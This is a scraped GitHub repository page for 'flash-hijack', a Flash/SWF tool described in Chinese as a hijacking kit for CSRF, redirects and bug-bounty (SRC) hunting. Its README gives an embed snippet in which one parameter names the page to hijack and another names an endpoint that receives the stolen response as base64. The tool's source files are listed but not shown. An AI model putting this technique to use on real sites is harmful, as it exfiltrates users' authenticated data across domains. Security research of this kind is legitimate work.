Skip to content
/ flash-hijack Public

flash 劫持轮子,CSRF,劫持,跳转,swf 有需求可以提issues ,src挖掘,劫持response

86 stars 15 forks Branches Tags Activity
Star
Notifications You must be signed in to change notification settings

7dog7/flash-hijack

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

15 Commits
jump
jump
 
 
README.md
README.md
 
 
hijack.as
hijack.as
 
 
hijack.jpg
hijack.jpg
 
 
hijack.swf
hijack.swf
 
 

Repository files navigation

flash-hijack

flash 劫持轮子

使用: HTML:

<div> <embed src="http://www.baidu.com/hijack.jpg?jpg=http://127.0.0.1/1.png&get=http://127.0.0.1/l.php&post=http://127.0.0.1/2.php" width="500" height="500" quality="high" pluginspage="http://www.macromedia.com/go/getflashplayer" type="application/x-shockwave-flash" wmode="transparent"></embed> </object> </div>

参数说明:

jpg:域下的图片(为了优先加载crossdomain.xml,否则劫持的接口加载太慢会导致无法劫持)

get:劫持的接口或者页面

post:接收劫持过来的页面为base64传输

文章:https://zhuanlan.zhihu.com/p/67484852

About

flash 劫持轮子,CSRF,劫持,跳转,swf 有需求可以提issues ,src挖掘,劫持response

Topics

swf hijack hijacking

Resources

Readme
Activity

Stars

86 stars

Watchers

4 watching

Forks

15 forks
Report repository

Releases

No releases published

Packages

No packages published

Languages